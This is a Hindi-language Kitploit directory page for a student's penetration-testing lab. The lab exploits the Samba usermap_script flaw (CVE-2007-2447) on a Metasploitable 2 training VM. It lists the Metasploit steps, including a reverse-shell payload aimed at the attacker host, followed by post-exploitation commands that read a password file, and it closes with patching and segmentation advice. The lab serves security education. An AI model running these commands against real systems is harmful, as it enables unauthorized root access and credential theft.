Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2 — चरण-दर-चरण पेनिट्रेशन टेस्टिंग लैब जो Metasploitable 2 पर Samba CVE-2007-2447 का शोषण करती है, Metasploit का उपयोग करके, रूट समझौता, क्रेडेंशियल चोरी, और डेटा एक्सफिल्ट्रेशन का प्रदर्शन करती है, शैक्षिक रेड टीम प्रशिक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/devinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणडेटा निष्कासनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubdevinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2

SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2

चरण-दर-चरण पेनिट्रेशन टेस्टिंग लैब जो Metasploitable 2 पर Samba CVE-2007-2447 का शोषण करती है, Metasploit का उपयोग करके, रूट समझौता, क्रेडेंशियल चोरी, और डेटा एक्सफिल्ट्रेशन का प्रदर्शन करती है, शैक्षिक रेड टीम प्रशिक्षण के लिए।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2

RedTeam-SMB-PenTest

linux bash

विवरण


यह परियोजना UMGC में CMIT 386 पाठ्यक्रम के भाग के रूप में मेरे पेनिट्रेशन टेस्टिंग अभ्यास का दस्तावेज़ीकरण करती है। यह काली लिनक्स आक्रमण VM से Metasploit का उपयोग करके Metasploitable 2 पर Samba SMB usermap_script कमजोरी (CVE-2007-2447) का शोषण करने पर केंद्रित है। यह प्रमाण की अवधारणा दर्शाती है कि कैसे एक पुरानी कमजोरी पूर्ण सिस्टम समझौता, क्रेडेंशियल चोरी और डेटा निष्कर्षण का कारण बन सकती है।

कमजोरी का अवलोकन

यह कमजोरी पोर्ट 445 पर Samba सेवा में स्थित है, जहाँ यूज़रनेम मैप स्क्रिप्ट में अनुचित इनपुट हैंडलिंग अनप्रमाणित रिमोट कमांड निष्पादन की अनुमति देती है। यदि इसका शोषण किया जाए तो यह हमलावरों को रूट-स्तरीय शेल एक्सेस प्रदान करता है।

वातावरण

अनुसरण करने के चरण

1. Metasploit लॉन्च करें:

root@kitploit:~
msfconsole


सुनिश्चित करें कि हमलावर होस्ट और पीड़ित मशीन दोनों बूट और चल रहे हैं।

2. शोषण खोजें:

root@kitploit:~
search samba

3. उपयुक्त मॉड्यूल का उपयोग करें:

root@kitploit:~
use exploit/multi/samba/usermap_script

4. आवश्यक विकल्प सेट करें:

root@kitploit:~
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse

5. शोषण निष्पादित करें:

root@kitploit:~
exploit

6. शोषण-पश्चात कमांड:

root@kitploit:~
whoami
hostname
cd /redteam7/student3
cat mypass.txt

रीसेट निर्देश

यदि सत्र हैंग या टूट जाए:

Metasploit रीसेट करें:

root@kitploit:~
# वर्तमान शेल छोड़ें
Ctrl C
exit
# सभी बैकग्राउंड जॉब्स को मारें
sessions -K             
jobs -K
# Metasploit पुनः प्रारंभ करें
msfconsole              

मुख्य निष्कर्ष

  • usermap_script वाली Samba 3.0.20 जैसी पुरानी सेवाएँ अत्यधिक कमजोर हैं।
  • इस SMB कमजोरी का शोषण करने से रूट शेल एक्सेस मिलता है।
  • सरल कमांड से महत्वपूर्ण डेटा प्राप्त किया जा सकता है, जो वास्तविक दुनिया के जोखिम को प्रदर्शित करता है।
  • यह पैचिंग, विभाजन और सेवा एक्सपोज़र को कम करने की आवश्यकता को साबित करता है।

अनुशंसाएँ

  • पुराने सिस्टम को तुरंत पैच या निष्क्रिय करें।
  • सख्त नेटवर्क विभाजन और फायरवॉल नियम लागू करें।
  • SMB एक्सपोज़र को केवल आंतरिक, प्रमाणित उपयोगकर्ताओं तक सीमित करें।
  • संदिग्ध गतिविधि और पार्श्व संचलन के लिए लॉग की निगरानी करें।

संदर्भ

  • Metasploit Samba usermap_script
  • CVE-2007-2447 विवरण
  • Metasploitable 2 शोषण सूची
टूल डाउनलोड करें
घटकविवरण
हमलावर VMKali Linux
पीड़ित VMMetasploitable 2
लक्ष्य पोर्ट445 (Samba/SMB)
उपयोग किया गया शोषणexploit/multi/samba/usermap_script
क्रेडेंशियल लक्ष्य/redteam7/student3/mypass.txt